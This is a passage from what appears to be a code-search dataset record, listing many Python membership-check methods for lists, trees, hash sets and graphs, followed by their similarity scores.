"def __contains__(self, item: Any) -> bool:\n curr = self._first\n\n while curr is not None:\n if curr.item == item:\n return True\n\n curr = curr.next\n\n return False", "def contains(self, x):\n raise NotImplementedError", "def contains(self, value: T) -> bool:\n def traverse(children: list) -> bool:\n for node in children:\n if node.value == value:\n return True\n else: \n if traverse(node.children):\n return True\n \n if self.value == value:\n return True\n elif traverse(self.children):\n return True\n else:\n return False", "def contains(self, value):\n if not self.head:\n return False\n # get a reference to the node we're currently at; update this as we traverse the list\n current = self.head\n # check to see if we're at a valid node\n while current:\n # return True if the current value we're looking at matches our target value\n if current.get_value() == value:\n return True\n # update our current node to the current node's next node\n current = current.get_next()\n # if we've gotten here, then the target node isn't in our list\n return False", "def contains(self, value):\n if self.root is None:\n return False\n else:\n if type(value) != self.typing: # not an error\n return False\n # TODO allow different yet comparable types\n else: \n hasElement, self.root = self.root.contains(value)\n return hasElement", "def contains(self, x):\n raise 
NotImplementedError()", "def __contains__(self, item):\n # type(Any) -> bool\n return list.__contains__(self, self.ref(item))", "def _contains(self, element):\n if element.is_Symbol:\n return None\n\n if not isinstance(element, Tuple) or len(element) != len(self.sets):\n return S.false\n\n return And(*[s.contains(e) for s, e in zip(self.sets, element)])", "def __contains__(self, value):\n found = False\n for i in range(len(self.data)):\n if self.data[i] == value:\n return True\n return found", "def __contains__(self, item):\n\n if self[item]:\n return True\n return False", "def __contains__(self,v):\n for i in self._items:\n if near(i,v):\n return True\n return False", "def contains(self, item):\n return self._dict.has_key(item)\n\n self.__contains__ = contains", "def __contains__(self, item):\n if self.is_empty():\n return False\n elif self._first == item:\n return True\n else:\n return self._rest.__contains__(item)\n # Equivalently, item in self._rest", "def includes(self, value):\n current = self.head\n while current:\n if current.value == value:\n return True\n else:\n current = current.next\n return False", "def contains(cls, value):\n return value in cls.values()", "def contains(self, key):\n visitor = VisitorContains()\n self.visit(key, visitor)\n return visitor.result", "def __contains__(self, val):\n if self.lookup.get(val, 0) > 0:\n return True\n else:\n return False", "def contains(item, obj):\n return obj.__contains__(item)", "def includes(self, value):\n current = self.head\n\n while current:\n if current.value == value:\n return True\n current = current.next\n return False", "def __contains__(self, item: Any) -> bool:\n if self.is_empty():\n return False\n elif self._first == item:\n return True\n else:\n return self._rest.__contains__(item)\n # Equivalently, item in self._rest", "def contains(self, val):\n return False if not self.search(val) else True", "def __contains__(self, item):\n return item in self._data", "def includes(self, value):\n current = self.head\n\n while current is not None:\n if current.value == value:\n return True\n current = current.next\n return False", "def __contains__(self, item):\n return self.contains(item)", "def contains(self, key):\n\n return self._get(\"contains\", key, rtype=Bool)", "def contains_edge(self, u: str, v: str) -> bool:\n if v in self.adj_list[u]:\n return True\n else:\n return False", "def contains(self, key):\n h = self.hash_value(key)\n return key in self.hs[h]", "def has_node(self, val):\n return val in self", "def has_node(self, val):\n return val in self", "def __contains__(self, i):\n return i in self._ar", "def contains(self, element):\n pass", "def __contains__(self, item):\n try:\n self[item]\n return True\n except KeyError:\n return False", "def contains(collection, target):\n\treturn target in collection", "def contains(cls, value):\n return any(value == item.value for item in cls)", "def __contains__(self, val):\n return val in self.ids or super().__contains__(val)", "def contains(self, value):\n\n node, parent, found = self.search(value)\n\n return found", "def __contains__(self, item: T) -> bool:\n for list_item in self:\n if list_item == item:\n return True\n\n return False", "def __contains__(self, aVertex):\n\n if isinstance(aVertex, str) and aVertex in self._vertices.keys():\n return True\n elif aVertex in self._vertices.values():\n return True\n else:\n return False", "def contains2(s, v):\n if empty(s) or s.first > v:\n return False\n elif s.first == v:\n return True\n else:\n return contains2(s.rest, v)", 
"def containItem(self, value):\n\t\tif self._linkHead == None:\n\t\t\treturn False\n\n\t\t_nodeCursor = self._linkHead\n\n\t\twhile _nodeCursor != None and _nodeCursor._itemValue != value:\n\t\t\t_nodeCursor = _nodeCursor._itemNext\n\n\t\tif _nodeCursor == None:\n\t\t\treturn False\n\n\t\treturn True", "def contains(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n return False", "def contains(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n return False", "def contains(self, key: int) -> bool:\n hashedVal = self.hashValue(key)\n head = self.array[hashedVal] \n while(head != None): \n if head.val == key:\n return True\n head = head.next\n return False", "def contains(self, value):\n for item in self.data:\n if item == value:\n return item\n return False", "def is_in(cls, s, t):\n\n assert cls.is_selector(s)\n assert cls.is_selector(t)\n\n s_exp = set(cls.expand(s))\n if s_exp == set([()]):\n return True\n t_exp = set(cls.expand(t))\n if s_exp.issubset(t_exp):\n return True\n else:\n return False", "def contains(self, item):\n for h_num in xrange(self.k):\n val = self.hash_value(item, h_num)\n if not self.arr[val]:\n return False\n else:\n return True", "def __contains__(self, item):\n return item in self._fetch()", "def contains(self, val):\n val = self._conversion(val)\n if isinstance(val, TYPES[self.__set_type]):\n return self.__tree.search(val)\n else:\n return str(\"TypeError : Wrong Input\")", "def contains(self, d):\n\n temp = self.head\n while temp is not None:\n if temp.data == d:\n return True\n else:\n temp = temp.next\n\n return False", "def __contains__(self, i):\n for j in self:\n if j == i:\n return True\n return False", "def contains(self, key):\n return key in self.hashset[key % self.N]", "def __contains__(self, value):\n\n try:\n # Just use __getitem__()\n self[value]\n except KeyError:\n return False\n else:\n return True", "def contains(\n self, key: int | str | ir.IntegerValue | ir.StringValue\n ) -> ir.BooleanValue:\n return ops.MapContains(self, key).to_expr()", "def __contains__(self, key):\n\n return key in self.keys_set", "def contain(graph, value):\n for node in graph:\n if node.value == value:\n return True\n\n return False", "def has_item(self, item):\n return item in self.set", "def has_item(self, item):\n return item in self.set", "def __contains__ (self, item):\n if isinstance(item, Node):\n item = item.id\n return item in self.network", "def __contains__(self, key):\n return self.keys[self._linear_probe(key, \"contains\")] is not None", "def __contains__(self, item):\n # return item in self._items\n # leverage improved performance index() function\n try:\n self.index(item)\n return True\n except ValueError:\n return False", "def contained(self,s):\n\n if s in self.symbols:\n return True\n else:\n return False", "def contains(self, value: object) -> bool:\n cur = self.root\n while cur is not None:\n if value == cur.value:\n return True\n\n elif value < cur.value:\n cur = cur.left\n\n else:\n cur = cur.right\n\n return False", "def __contains__(self, item):\n return item in self.contents", "def __contains__(self, key):\n return self.contains(key)", "def contains(self, val):\n if val == self.val:\n return True\n elif val < self.val:\n if self.left is None:\n return False\n return self.left.contains(val)\n elif val > self.val:\n if self.right is None:\n return False\n return self.right.contains(val)", "def do_contains(d, *ks):\n try:\n _ = do_get(d, *ks)\n except KeyError:\n 
return False\n else:\n return True", "def contains(self, value):\n n = self.search(value)\n return (n.value==value, n)", "def contains(s1, s2):\n\n return s2 in s1", "def __contains__(self, key):\n\t\treturn any([item == key for _, item in self.heap])", "def contains(self, value):\n return LongObjectHashMap.self.containsValue(value)", "def contains(self, item):\n # Find a node with the given item, if any\n node = self._find_node(item)\n # Return True if a node was found, or False\n return node is not None", "def contains(base, sub_list):\n\n return set(base) & set(sub_list) == set(sub_list)", "def contains(self, key: int) -> bool:\n if key in self.d:\n return True\n else:\n return False", "def contains_vect(self, v: Tuple[float, float]) -> bool:\n assert len(v) == 2\n return bool(lib.cpBBContainsVect(self, v))", "def __contains__(self, key):\n found = True\n try:\n self.__getitem__(key)\n except:\n found = False\n return found", "def __contains__(self, item: Any) -> bool:\n try:\n return item in self.contents\n except TypeError:\n try:\n return item is self.contents\n except TypeError:\n return item == self.contents # type: ignore", "def tree_contains(T, x):\n if T.label == x:\n return True\n for c in T:\n if tree_contains(c, x):\n return True\n return False", "def has(cls, item):\n return item in cls.values()", "def contains(a, b, **kwargs):\n return lib.contains(a, b, **kwargs)" ]
[ "0.7584771", "0.7085561", "0.6912982", "0.6782562", "0.6782562", "0.6781164", "0.6648094", "0.6498835", "0.647441", "0.64625543", "0.6434304", "0.64121056", "0.6409181", "0.64012474", "0.63954437", "0.6387302", "0.63849604", "0.6380661", "0.634651", "0.63379276", "0.63075536", "0.6300176", "0.62924343", "0.628142", "0.62513894", "0.6242932", "0.62313217", "0.6226083", "0.6213911", "0.6212287", "0.62009454", "0.61986667", "0.6197378", "0.6192886", "0.6172995", "0.6170701", "0.6166052", "0.61624324", "0.6161323", "0.6155148", "0.61523384", "0.61380345", "0.61198765", "0.611585", "0.61127424", "0.610699", "0.6103992", "0.6101404", "0.6097174", "0.6097174", "0.6096107", "0.6090682", "0.6087924", "0.60854435", "0.6084288", "0.608075", "0.6074129", "0.60556024", "0.6051419", "0.6032506", "0.6022769", "0.6016537", "0.6016537", "0.6012653", "0.6004175", "0.6000692", "0.599946", "0.5995462", "0.59840304", "0.5980011", "0.5979232", "0.5979193", "0.5974428", "0.5970334", "0.595228", "0.5936049", "0.5922856", "0.5922856", "0.59191656", "0.5915123", "0.5907492", "0.59061116", "0.59009284", "0.5895329", "0.58912975", "0.5867798", "0.5863938", "0.5861764", "0.5860971", "0.585378", "0.58534545", "0.58425444", "0.58414406", "0.58345085", "0.5812435", "0.58096164", "0.58078116", "0.5804594", "0.5802712", "0.5796666" ]
0.7024014
2
Return set s with v adjoined
def adjoin(s, v): if contains(s, v): return s else: return Link(v, s)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_join(self):\n s = djset()\n s.add([1, 2, 3])\n s.add([4, 5, 6])\n s.add([2, 5])\n self.assertEquals({1, 2, 3, 4, 5, 6}, s.data[1])\n self.assertFalse(2 in s.data)", "def getSets():", "def aspset(self):\n try:\n return pset([x.aspset() for x in self])\n except Exception:\n try:\n return frozenpset([x.aspset() for x in self])\n except Exception:\n pass\n return frozenpset([x for x in self])", "def getSet(unique_name):", "def getSet(unique_name):", "def union(s1, s2):\n \"*** YOUR CODE HERE ***\"\n s = set()\n for member in s1:\n s.add(member)\n for member in s2:\n s.add(member)\n return s", "def union(set1, set2):", "def make_set(g, nodes):\n s = Set()\n names = nodes['names']\n for ii,name in enumerate(names):\n \"\"\" \n We will assume node is entirely contained\n in group if they have one atom in common\n \"\"\" \n atoms = mdn.dic2list(nodes[name]['atoms'])\n atom0 = atoms[0]\n if (atom0 in mdn.dic2list(g['atoms'])):\n s.add(ii)\n return s", "def getJoinedItemSet(self, termSet, k):\n return set([term1.union(term2) for term1 in termSet for term2 in termSet \n if len(term1.union(term2))==k])", "def getSets(unique_name=None):", "def set():", "def join(self, a, *args):\n mapping = self._mapping\n set_a = mapping.setdefault(a, [a])\n\n for arg in args:\n set_b = mapping.get(arg)\n if set_b is None:\n set_a.append(arg)\n mapping[arg] = set_a\n elif set_b is not set_a:\n if len(set_b) > len(set_a):\n set_a, set_b = set_b, set_a\n set_a.extend(set_b)\n for elem in set_b:\n mapping[elem] = set_a", "def joinSet(itemSet, length):\n return set([i.union(j) for i in itemSet for j in itemSet if len(i.union(j)) == length])", "def merge_working_sets(self, other):\n\n for dist in other.by_key.values(): self.add(dist)\n return self", "def intersect_sets(S):\n res = S[0]\n for s in S:\n res &= s\n return res", "def owningSet(self) -> ghidra.util.graph.KeyIndexableSet:\n ...", "def link_to_set(page):\n #s = set()\n links = Measurements.get_all_links(page)\n s = set(links)\n return s", "def union(self, otherpvalueset):\n for candidate in otherpvalueset.pvalues.itervalues():\n self.add(candidate)", "def intersection(self, s2):\n s1 = self\n if s1.is_full:\n return s2\n if s2.is_full:\n return s1\n return IdSet(s1._set.intersection(s2._set))", "def join(self, a, b):\n r = defaultdict(lambda: 0)\n c = itertools.chain(a.get_elements().items(),\n b.get_elements().items())\n for element, n in c:\n r[element] = Nat_add(r[element], n)\n\n r = dict(**r)\n return Multiset(r, self.S)", "def __add__(self, other):\n if not isinstance(other, (list, Set)):\n raise TypeError(\"sets can only be joined with sets\")\n new_set = self._clone()\n for element in other:\n new_set._insert(element)\n return new_set", "def get_ads():\n return coll_ad.distinct(KEY_AD_ID)", "def lego_sets():\n # you must replace this line and return your own list\n return []", "def union_sets(S):\n res = set()\n for s in S:\n res |= s\n return res", "def getDirectFollowSets(self, FIRST):\n self.init_follow = {v:set() for v in self.v }\n self.containsFOLLOWOf = set()\n for v in self.v:\n if v == self.np[0][0]: # Starting Production\n self.init_follow[v] = set(['$']) # $ is in follow of 'S' applying rule 1\n for prod in self.g[v]:\n for i in range(len(prod)):\n if prod[i] in self.v and i+1 < len(prod):\n if prod[i+1] in self.t:\n self.init_follow[prod[i]] |= set([prod[i+1]])\n else:\n t = i + 1\n while t < len(prod) and prod[t] in self.nullables_map:\n if self.nullables_map[prod[t]] == True:\n self.init_follow[prod[i]] |= 
FIRST[prod[t]]-set(['epsilon'])\n else:\n self.init_follow[prod[i]] |= FIRST[prod[t]]\n break\n t += 1\n if t >= len(prod): # every thing on rhs of prod[i] could produce epsison, rule - 3\n self.containsFOLLOWOf |= set([(prod[i], v)])\n else: #prod[i+1] is a non nullable prod or prod[t] was a terminal\n if prod[t] in self.t:\n self.init_follow[prod[i]] |= set([prod[t]])\n else:\n self.init_follow[prod[i]] |= FIRST[prod[t]]-set(['epsilon'])\n\n elif prod[i] in self.v:\n self.containsFOLLOWOf |= set([(prod[i], v)]) # applying rule 2\n\n #self.containsFOLLOWOf = set([(a, b) for (a, b) in self.containsFOLLOWOf if a != b]) # remove the self loops\n return self.init_follow", "def union(self, other):\n # initialize new Set from the elements in the first Set\n union_set = Set(self.get_elements())\n\n # add every element in the second Set to a new Set and return it\n for element in other.get_elements():\n union_set.add(element)\n return union_set", "def set(self) -> set:\n return set(self)", "def union(self, other):\n self.find_set()._link(other.find_set())", "def _eval_rewrite_as_Union(self, *sets, **kwargs):\n\n dj_union = S.EmptySet\n index = 0\n for set_i in sets:\n if isinstance(set_i, Set):\n cross = ProductSet(set_i, FiniteSet(index))\n dj_union = Union(dj_union, cross)\n index = index + 1\n return dj_union", "def __init__(self):\n self.EntireSet = []", "def getOneItemSet(self, transListSet):\n itemSet = set()\n for line in transListSet:\n for item in line:\n itemSet.add(frozenset([item]))\n return itemSet", "def _collect_set(self, pidset):", "def Set(self) -> None:", "def mst(v, e):\n vold = set(v)\n vnew = set([v[0]])\n result = set()\n edges = sorted(e)\n \n while vnew != vold:\n for uv in edges:\n old = (uv.v1 in vnew) + (uv.v2 in vnew)\n if old == 1:\n vnew.add(uv.v1)\n vnew.add(uv.v2)\n result.add(uv)\n #edges.remove(uv)\n break\n \n return result", "def copySet(_session, _set_src, _set_dst, _segment):\n it = _session.create_iterator(_session.sc_constraint_new(sc_constants.CONSTR_3_f_a_a,\n _set_src,\n sc.SC_ARC,\n 0), True)\n \n while not it.is_over():\n# s_el = it.value(2)\n# _idtf = _session.get_idtf(s_el)\n# el = s_el\n# if isSystemId(_idtf):\n# el = _session.create_el(_segment, _session.get_type(s_el))\n createPair(_session, _segment, _set_dst, it.value(2), _session.get_type(it.value(1)))\n it.next()", "def get_from_set(set_):\n for e in set_: return e", "def actg_to_set_list(s: list[list[str]], d: dict) -> list[set[int]]:\r\n s_out = [set() for m in range(len(s))]\r\n for i in range(len(s)):\r\n for j in range(len(s[i])):\r\n t = find_str_in_dict(s[i][j], d)\r\n s_out[i].add(t)\r\n return s_out", "def lego_sets():\n # you must replace this line and return your own list\n return lego_sets_list", "def insercionListas(L1,L2):\n return set(L1) & set(L2)", "def add_sets(self, key, member):\n return self.redis.sadd(key, member)", "def select_seeds(self, graph, k):\n raise NotImplementedError\n return set()", "def __mul__(self, other):\n if not isinstance(other, (Set, list)):\n raise TypeError(f\"could not intersect set and {type(other)}\")\n\n return Set(x for x in other if x in self)", "def union(set_1, set_2):\n union_list = []\n\n for number in set_2: # Adds numbers to set_1, since this is the last step\n set_1.append(number)\n \n set_1.sort()\n\n for number in set_1:\n if number not in union_list:\n union_list.append(number)\n \n print(\"Union:\", union_list)\n return set_1, set_2", "def union(a, b):\r\n return list(set(a) | set(b))", "def adjoint(self):\n return 
self.conjugate().transpose()", "def add_elements_to_set(s: set, *args) -> set:\n s.update(set(*args))\n return s", "def sets(self):\n return self._sets", "def toset(series: pd.Series) -> Set:\n\n return set(series.tolist())", "def join(self) -> List[Dict[str, Any]]:\n return self.matched + self.unmatched", "def edges(self) -> Set[Tuple[int, int]] : \n edges : Set[Tuple[int, int]] = set()\n for node_id in self.nodes: # iterator over id's\n for adj_node in self.nodes[node_id]:\n edge = (node_id, adj_node)\n if self.directed:\n edges.add(edge)\n else:\n if edge[::-1] not in edges: # if reverse edge not in edges...\n edges.add(edge)\n return edges", "def adjacent(self):\n result = set([v for e in self.edges for v in [e.v1, e.v2]])\n result.remove(self)\n return result", "def sets(self):\n\n return self._collection.distinct('set')", "def add_set(self, repres):\n s = self.set_indx(repres)\n if not s is None:\n raise Exception\n self._data.append(set(repres))", "def joins(self):\n return self._joins", "def get_set(css_class_name, set_num=0):\r\n if not root:\r\n return None\r\n item = root.xpath('//dl[@class=\"%s\"]/dd' % css_class_name)\r\n if len(item) <= set_num:\r\n return None\r\n sets_node = item[set_num]\r\n item_set = set([ut.unicodeanyway(node.text).replace('\\n', '')\r\n for node\r\n in sets_node.xpath('.//a') if node.text is not None])\r\n \r\n \r\n \r\n return item_set", "def merge_one_set(a):\n\n merge_to_index = 0\n determined = []\n while merge_to_index < len(a) - 1:\n compare_index = merge_to_index + 1\n while compare_index < len(a):\n intersection = a[merge_to_index].intersection(a[compare_index])\n if intersection:\n a[merge_to_index] = a[merge_to_index].union(a[compare_index])\n a.pop(compare_index)\n compare_index = merge_to_index + 1\n if len(intersection) > 1:\n determined = merge_two_sets(determined, [intersection,])\n else:\n compare_index += 1\n merge_to_index += 1\n \n return determined", "def _control_union(self, entities_1: List[str], entities_2: List[str]):\n return list(set(entities_1).union(set(entities_2)))", "def __and__(self, rs):\n revs = {}\n for r in self._revs.keys():\n if r in rs:\n revs[r] = 1\n return RevisionSet(revs)", "def _filter_satisfied(self, update_setd=False):\n\n model = self.oracle.get_model()\n setd = set()\n\n for i, cl in enumerate(self.soft):\n if not self.satc[i]:\n if self._satisfied(cl, model):\n self.satc[i] = True\n self.ss_assumps.append(self.sels[i])\n else:\n setd = setd.union(set(cl))\n\n if update_setd:\n self.setd = list(setd)", "def create_C1(data_set):\r\n C1 = set()\r\n for t in data_set:\r\n for item in t:\r\n item_set = frozenset([item])\r\n C1.add(item_set)\r\n return C1", "def build_set(self, s):\n comma = self.art_type([self.string_type(', ')], baseline=0)\n repr_elems = self.concatenate(s, comma)\n return self.build_container(\n repr_elems, self.left_curly_brace, self.right_curly_brace)", "def to_set(elem_sort, *elems):\n res = LambdaSet.get_empty(elem_sort)\n for elem in elems:\n res = res.insert(elem)\n return res", "def entities(self):\n triples = self.triples()\n return set(pd.concat((triples[\"head\"], triples[\"tail\"])))", "def merge(self, sets):\n merge = None\n for _, item in enumerate([item['data'] for item in sets]):\n if merge is None:\n merge = item\n else:\n Logger().info(\n 'Partition size = {0}'.format(\n PartitionRunner.merge_size(merge, item, how='outer', group_by=self._unique_columns)\n )\n )\n\n merge = merge.merge(\n item,\n on=self._unique_columns,\n how='outer'\n )\n return merge", "def 
alphabet(S):\r\n result = set()\r\n for s in S:\r\n for a in s:\r\n result.add(a)\r\n return result", "def build_set(ls, dsets):\n\n def noh(ls, dsets):\n \"\"\"\n This function remove hydrogens from the selection\n \"\"\"\n data_set = build_set(ls[1], dsets)\n\n noh_set = set()\n pred = oechem.OEIsHydrogen()\n\n for idx in data_set:\n atom = system.GetAtom(oechem.OEHasAtomIdx(idx))\n if not pred(atom):\n noh_set.add(idx)\n\n return noh_set\n\n def residues(ls):\n \"\"\"\n This function select residues based on the residue numbers. An example of\n selection can be:\n mask = 'resid A:16 17 19 B:1'\n \"\"\"\n # List residue atom index to be restrained\n res_atom_set = set()\n\n # Dictionary of lists with the chain residues selected to be restrained\n # e.g. {chainA:[res1, res15], chainB:[res19, res17]}\n chain_dic = {'': []}\n\n # Fill out the chain dictionary\n i = 0\n while i < len(ls):\n if ls[i].isdigit():\n chain_dic[''].append(int(ls[i]))\n i += 1\n else:\n try:\n chain_dic[ls[i]].append(int(ls[i + 2]))\n except:\n chain_dic[ls[i]] = []\n chain_dic[ls[i]].append(int(ls[i + 2]))\n i += 3\n\n # Loop over the molecular system to select the atom indexes to be selected\n hv = oechem.OEHierView(system, oechem.OEAssumption_BondedResidue + oechem.OEAssumption_ResPerceived)\n for chain in hv.GetChains():\n chain_id = chain.GetChainID()\n if chain_id not in chain_dic:\n continue\n for frag in chain.GetFragments():\n for hres in frag.GetResidues():\n res_num = hres.GetOEResidue().GetResidueNumber()\n if res_num not in chain_dic[chain_id]:\n continue\n for oe_at in hres.GetAtoms():\n res_atom_set.add(oe_at.GetIdx())\n\n return res_atom_set\n\n def around(dist, ls):\n \"\"\"\n This function select atom not far than the threshold distance from\n the current selection. 
The threshold distance is in Angstrom\n\n selection can be:\n mask = '5.0 around ligand'\n \"\"\"\n # at = system.GetAtom(oechem.OEHasAtomIdx(idx))\n\n # Atom set selection\n atom_set_around = set()\n\n # Create a OE bit vector mask for each atoms\n bv_around = oechem.OEBitVector(system.GetMaxAtomIdx())\n\n # Set the mask atom\n for at in system.GetAtoms():\n if at.GetIdx() in ls:\n bv_around.SetBitOn(at.GetIdx())\n\n # Predicate\n pred = oechem.OEAtomIdxSelected(bv_around)\n\n # Create the system molecule based on the atom mask\n molecules = oechem.OEMol()\n oechem.OESubsetMol(molecules, system, pred)\n\n # Create the Nearest neighbours\n nn = oechem.OENearestNbrs(system, float(dist))\n\n for nbrs in nn.GetNbrs(molecules):\n for atom in oechem.OEGetResidueAtoms(nbrs.GetBgn()):\n if atom.GetIdx() in ls:\n continue\n atom_set_around.add(atom.GetIdx())\n\n return atom_set_around\n\n # Start Body of the selection function by language\n\n # Terminal Literal return the related set\n if isinstance(ls, str):\n return dsets[ls]\n # Not or Noh\n if len(ls) == 2:\n if ls[0] == 'noh': # Noh case\n return noh(ls, dsets)\n elif ls[0] == 'not': # Not case\n return dsets['system'] - build_set(ls[1], dsets)\n else: # Resid case with one index\n return residues(ls[1])\n\n if len(ls) == 3:\n if ls[1] == 'or': # Or Case (set union)\n return build_set(ls[0], dsets) | build_set(ls[2], dsets)\n elif ls[1] == 'and': # And Case (set intersection)\n return build_set(ls[0], dsets) & build_set(ls[2], dsets)\n elif ls[1] == 'diff': # Diff case (set difference)\n return build_set(ls[0], dsets) - build_set(ls[2], dsets)\n elif ls[1] == 'around': # Around case\n return around(ls[0], build_set(ls[2], dsets))\n else:\n return residues(ls[1:]) # Resid case with one or two indexes\n else:\n if ls[0] == 'resid':\n return residues(ls[1:]) # Resid case with multiple indexes\n else:\n raise ValueError(\"The passed list have too many tokens: {}\".format(ls))", "def find_set(self):\n return self._set_set(self._find_set())", "def buildConnectedSets(self, cars):", "def get_joins(self, p, vv):\n self._get_joins(p, vv)", "def create_relation_superset(self):\n # trace = [a, b, c]\n # trace x trace = [(a, a), (a, b), ..., (c, a), (c, b), (c, c)]\n return itertools.product(self.activities, self.activities)", "def create_C1(data_set):\n C1 = set()\n for t in data_set:\n for item in t:\n item_set = frozenset([item])\n C1.add(item_set)\n return C1", "def apply(self):\n results = set()\n\n source = self.create_relation_superset()\n\n total_traces = len(self.log)\n\n if total_traces == 0:\n return list(results)\n\n if self.mode == Relationship.Mode.FORALL: # For all condition\n for a1, a2 in source:\n res = 0\n for trace in self.log:\n apply = self.apply_to_trace(trace, a1, a2)\n res += 1 if apply else 0\n\n if res / total_traces >= (1 - self.noise_threshold):\n results.add((a1, a2))\n\n elif self.mode == Relationship.Mode.EXISTS: # Exists condition\n for a1, a2 in source:\n res = False\n for trace in self.log:\n res = res or self.apply_to_trace(trace, a1, a2)\n\n if res:\n break\n\n if res:\n results.add((a1, a2))\n\n return list(results)", "def single(self):\r\n\t\treturn list(set(self.sample))", "def build_adj_dict(self, Set):\n \t\tif len(Set):\n\n \t\t\tfor bubble in Set:\t\n \t\t\t\t\n \t\t\t\tdistance = dist(bubble.Bubble_last_pos, self.Bubble_last_pos)\n \t\t\t\tif distance <= (bubble.Bubble_radius * 1.2 + self.Bubble_radius * 1.2):\n \t\t\t\t\t# add edge between new bubble and existing bubble\n \t\t\t\t\tif bubble.color not in 
self.adj_dict.keys():\n\t\t\t\t\t\tself.adj_dict.setdefault(bubble.color,[]).append(bubble)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif bubble not in self.adj_dict[bubble.color]:\n\t\t\t\t\t\t\tself.adj_dict[bubble.color].append(bubble)\n\n\t\t\t\t\t\n\t\t\t\t\tif self.color not in bubble.adj_dict.keys(): \n\t\t\t\t\t\tbubble.adj_dict.setdefault(self.color,[]).append(self)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self not in bubble.adj_dict[self.color]:\n\t\t\t\t\t\t\tbubble.adj_dict[self.color].append(self)\n\t\t\t\t\t\n\t\t\n\t\treturn self.adj_dict", "def all_in_set(the_set, the_list):\n return True", "def power_set(sett):\n\n powerset_so_far = {frozenset()}\n\n for element in sett:\n set.update(powerset_so_far,\\\n extend_all(element, powerset_so_far))\n \n return powerset_so_far", "def power_set(self):\n if self._is_empty():\n return Set([Set()])\n\n copy_set = self._clone()\n\n element = copy_set.__from__()\n\n power_set = copy_set.power_set()\n\n result = Set()\n\n for item in power_set:\n result += Set([Set([element]) + item]) + Set([item])\n return result", "def adyacentes(self,v):\n return list(self.vertices[v].keys())", "def adj_to(self, v):\n\n neighbours = set()\n\n for (x, y) in self._edges:\n if x == v: neighbours.add(y)\n if y == v: neighbours.add(x)\n\n return neighbours", "def SetFunction():\r\n s2 = []\r\n s3 = []\r\n s4 = []\r\n s2 = { i for i in range(21) if i%2 == 0}\r\n s3 = { i for i in range(21) if i%3 == 0}\r\n s4 = { i for i in range(21) if i%4 == 0}\r\n s2 = set(s2)\r\n s3 = set(s3)\r\n s4 = set(s4)\r\n print s3.issubset(s2)\r\n print s4.issubset(s2)", "def activity_set(act_cs):\n ai_strs = [ai for ai in act_cs.split(\",\")]\n\n if ai_strs[-1] == \"\":\n ai_strs = ai_strs[:-1]\n\n if ai_strs[0] == \".\":\n aset = set()\n else:\n aset = set([int(ai) for ai in ai_strs])\n\n return aset", "def __listunion(self, c1, c2):\n s1 = {}\n for delta in c1:\n s1[delta] = 1\n\n\tc = c1[:]\n\tfor delta in c2:\n if not s1.has_key(delta):\n\t\tc.append(delta)\n\n\treturn c", "def to_set(self) -> Set[Tuple[int, int]]:\n return set(self.steps)", "def A(self, tokens):\n\n if not tokens:\n tokens = []\n return self.A_set[tuple(tokens)]", "def joins((u,v,o)):\r\n return { W : ((u,v), (u-1,v)),\r\n S : ((u,v), (u,v-1)) }[o]", "def _as_delimited_set(self, name):\n org_type = self._get_type(name)\n if org_type == 'delimited set': return None\n valid = ['single', 'string']\n if not org_type in valid:\n msg = 'Cannot convert variable {} of type {} to delimited set!'\n raise TypeError(msg.format(name, org_type))\n if org_type == 'single':\n self._meta['columns'][name]['type'] = 'delimited set'\n self._data[name] = self._data[name].apply(\n lambda x: str(int(x)) + ';' if not np.isnan(x) else np.NaN)\n return None\n elif org_type == 'string':\n # we assume we have a delimited set in the string variable\n # delimited with a semicolon agree;disagree;agree\n original_column = self._data[name]\n # we encapsulate each line with !; ;! 
so that the string\n # replacement works correctly\n if original_column.dropna().tolist()[0][-1] == \";\":\n original_column = \"!;\" + original_column + \"!\"\n else:\n original_column = \"!;\" + original_column + \";!\"\n\n original_column = original_column.replace(pd.np.nan,'')\n original_column = original_column.str.replace(\"; \",\";\")\n original_column = original_column.str.replace(\" ;\",\";\")\n\n all_values_split = [i.split(\";\") for i in original_column]\n flat = [i for sublist in all_values_split for i in sublist]\n trim = [i.strip() for i in flat]\n trim = [i for i in trim if len(i)>0]\n unique = list(set(trim))\n if \"!\" in unique:\n unique.remove(\"!\")\n unique.sort()\n value_map = []\n quantipy_values = []\n for k,item in enumerate(unique):\n value_map.append((k,item))\n quantipy_values.append({'text':{self.meta()['lib']['default text']:item},'value':k})\n original_column = original_column.str.replace(\";\" + re.escape(item) + \";\",\";\" + str(k) + \";\")\n original_column = original_column.str.replace(\"; \",\";\")\n # remove the ;! !; we placed at the beginning and end of each string\n original_column = original_column.str.replace(\"!;\",\"\")\n original_column = original_column.str.replace(\"!\",\"\")\n self._meta['columns'][name]['values'] = quantipy_values\n self._meta['columns'][name]['type'] = 'delimited set'\n self._data[name] = original_column", "def rebulid_connected_set(tmp, M_x):\n g = Graph(len(tmp))\n for i in range(0, len(tmp)):\n for j in range(i, len(tmp)):\n if Is_neighbor(tmp[i], tmp[j]):\n g.addEdge(i, j)\n cc = g.connectedComponents()\n tmps = []\n x = []\n for i in range(0, len(cc)):\n x_=[]\n tmp_ = list(tmp[cc[i][0]].flatten())\n x_.append(M_x[tmp[cc[i][0]][0]][tmp[cc[i][0]][1]])\n for j in range(1, len(cc[i])):\n tmp_ = tmp_+list(tmp[cc[i][j]].flatten())\n x_.append(M_x[tmp[cc[i][j]][0]][tmp[cc[i][j]][1]])\n x.append(calculate_1_center(x_))\n tmp_ = set(tmp_)\n tmps.append(list(tmp_))\n return tmps, x", "def sat_generate_candidate_assignments(self):\n # YOUR CODE HERE\n short = min(len(c) for c in self.clauses)\n for c in self.clauses:\n if len(c) == short:\n return set(c.literals)\n # return (set(x.literals) for x in self.clauses if len(x) == min(len(c) for c in self.clauses))", "def union(a, b):\n return list(set(a) | set(b))", "def union(a, b):\n return list(set(a) | set(b))", "def handle_set(self, agent) -> Tuple[Optional[str], Any]:\n ref_obj_d = {\"filters\": self.action_dict[\"filters\"]}\n ref_objs = self.subinterpret[\"reference_objects\"](\n self, self.speaker_name, ref_obj_d, extra_tags=[\"_physical_object\"]\n )\n if len(ref_objs) == 0:\n raise ErrorWithResponse(\"I don't know what you're referring to\")\n\n triples_d = self.action_dict[\"upsert\"][\"memory_data\"].get(\"triples\")\n if len(triples_d) == 1 and 